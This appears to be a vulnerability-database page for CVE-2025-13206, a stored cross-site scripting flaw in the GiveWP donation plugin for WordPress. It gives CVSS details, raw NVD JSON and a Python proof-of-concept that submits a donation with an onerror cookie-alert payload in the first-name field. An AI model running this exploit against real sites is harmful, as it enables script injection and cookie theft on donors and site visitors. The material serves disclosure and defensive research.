Security Vulnerability Report
中文
CVE-2025-13206 CVSS 7.2 HIGH

CVE-2025-13206

Published: 2025-11-19 08:15:52
Last Modified: 2025-11-26 16:22:12

Description

The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘name’ parameter in all versions up to, and including, 4.13.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Avatars must be enabled in the WordPress install in order to exploit the vulnerability.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:* - VULNERABLE
GiveWP plugin < 4.13.0 (all versions up to and including 4.13.0)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-13206 PoC - GiveWP Stored XSS via name parameter # Target: WordPress site with GiveWP plugin <= 4.13.0 target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com" # Malicious payload for stored XSS xss_payload = '<img src=x onerror=alert(document.cookie)>' # Donation form endpoint (typically under WordPress post/page with GiveWP shortcode) donation_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Prepare the donation submission request data = { 'action': 'give_donation_form_submit', 'give_form_id': '1', 'give_price': '10.00', 'give_first': xss_payload, # Inject XSS in first name field 'give_last': 'Test', 'give_email': '[email protected]', 'give_title': '', 'give_description': '', 'give_amount': '10' } print(f"[*] Sending malicious donation request to {target_url}") print(f"[*] XSS Payload: {xss_payload}") try: response = requests.post(donation_endpoint, data=data, timeout=10) if response.status_code == 200: print("[+] Donation processed - XSS payload stored") print("[+] Visit the donor wall page to trigger the XSS") print(f"[+] Endpoint: {target_url}/donors/") else: print(f"[-] Request failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13206", "sourceIdentifier": "[email protected]", "published": "2025-11-19T08:15:52.023", "lastModified": "2025-11-26T16:22:12.233", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘name’ parameter in all versions up to, and including, 4.13.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Avatars must be enabled in the WordPress install in order to exploit the vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "4.13.1", "matchCriteriaId": "A68A8D9E-D2CF-4C71-9207-526A2782B785"}]}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/give/tags/4.11.0/includes/class-give-donor.php#L1135", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/browser/give/tags/4.11.0/includes/process-donation.php#L1230", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/browser/give/tags/4.11.0/templates/shortcode-donor-wall.php#L59", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/changeset/3398128/", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/95823720-e1dc-46c1-887b-ffd877b2fbe5?source=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}